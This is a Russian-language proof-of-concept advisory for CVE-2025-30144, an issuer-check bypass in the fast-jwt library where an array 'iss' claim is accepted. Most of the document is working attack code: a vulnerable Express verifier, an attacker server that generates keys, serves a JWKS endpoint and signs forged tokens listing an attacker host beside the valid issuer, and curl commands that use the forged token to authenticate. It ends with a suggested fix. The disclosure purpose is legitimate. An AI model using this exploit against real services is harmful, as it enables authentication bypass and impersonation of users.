
Доказательство концепции для CVE-2025-30144: обход проверки издателя JWT в библиотеке fast-jwt, позволяющая злоумышленникам подделывать токены с использованием массива в утверждении iss.
Библиотека fast-jwt некорректно проверяет утверждение iss в соответствии с RFC https://datatracker.ietf.org/doc/html/rfc7519#page-9.
Проверка утверждения iss (эмитент) в библиотеке fast-jwt допускает массив строк как допустимое значение iss. Этот недостаток проектирования позволяет потенциальную атаку, при которой злоумышленник создает JWT с утверждением iss вида ['https://attacker-domain/', 'https://valid-iss']. Из-за либеральной проверки JWT будет признан действительным.
Более того, если приложение полагается на внешние библиотеки, такие как get-jwks, которые не выполняют самостоятельную проверку утверждения iss, злоумышленник может использовать эту уязвимость для подделки JWT, который будет принят приложением-жертвой. По сути, злоумышленник может вставить свой собственный домен в массив рядом с легитимным эмитентом и обойти предполагаемые проверки безопасности.
issВозьмем сервер, запускающий следующий код:
const express = require('express')
const buildJwks = require('get-jwks')
const { createVerifier } = require('fast-jwt')
const jwks = buildJwks({ providerDiscovery: true });
const keyFetcher = async (jwt) =>
jwks.getPublicKey({
kid: jwt.header.kid,
alg: jwt.header.alg,
domain: jwt.payload.iss
});
const jwtVerifier = createVerifier({
key: keyFetcher,
allowedIss: 'https://valid-iss',
});
const app = express();
const port = 3000;
app.use(express.json());
async function verifyToken(req, res, next) {
const headerAuth = req.headers.authorization.split(' ')
let token = '';
if (headerAuth.length > 1) {
token = headerAuth[1];
}
const payload = await jwtVerifier(token);
req.decoded = payload;
next();
}
// Endpoint to check if you are auth or not
app.get('/auth', verifyToken, (req, res) => {
res.json(req.decoded);
});
app.listen(port, () => {
console.log(`Server is running on port ${port}`);
});
Теперь создадим сервер, который будет использоваться для генерации JWT токена и отправки ключей проверки на сервер-жертву:
const { generateKeyPairSync } = require('crypto');
const express = require('express');
const pem2jwk = require('pem2jwk');
const jwt = require('jsonwebtoken');
const app = express();
const port = 3001;
const host = `http://localhost:${port}/`;
const { publicKey, privateKey } = generateKeyPairSync("rsa",
{ modulusLength: 4096,
publicKeyEncoding: { type: 'pkcs1', format: 'pem' },
privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
},
);
const jwk = pem2jwk(publicKey);
app.use(express.json());
// Endpoint to create token
app.post('/create-token', (req, res) => {
const token = jwt.sign({ ...req.body, iss: [host, 'https://valid-iss'], }, privateKey, { algorithm: 'RS256' });
res.send(token);
});
app.get('/.well-known/jwks.json', (req, res) => {
return res.json({
keys: [{
...jwk,
alg: 'RS256',
use: 'sig',
}]
});
})
app.all('*', (req, res) => {
return res.json({
"issuer": host,
"jwks_uri": host + '.well-known/jwks.json'
});
});
app.listen(port, () => {
console.log(`Server is running on port ${port}`);
});
export TOKEN=$(curl -X POST http://localhost:3001/create-token -H "Content-Type: application/json" -d '{"name": "test"}')
curl -X GET http://localhost:3000/auth -H "Authorization: Bearer $TOKEN"
Приложения, полагающиеся на проверку утверждения iss в fast-jwt, позволяют злоумышленникам подписывать произвольные полезные нагрузки, которые будут приняты верификатором.
Измените https://github.com/nearform/fast-jwt/blob/d2b0ccb103848917848390f96f06acee339a7a19/src/verifier.js#L475 на валидатор, который принимает только строку в качестве значения, как указано в RFC https://datatracker.ietf.org/doc/html/rfc7519#page-9.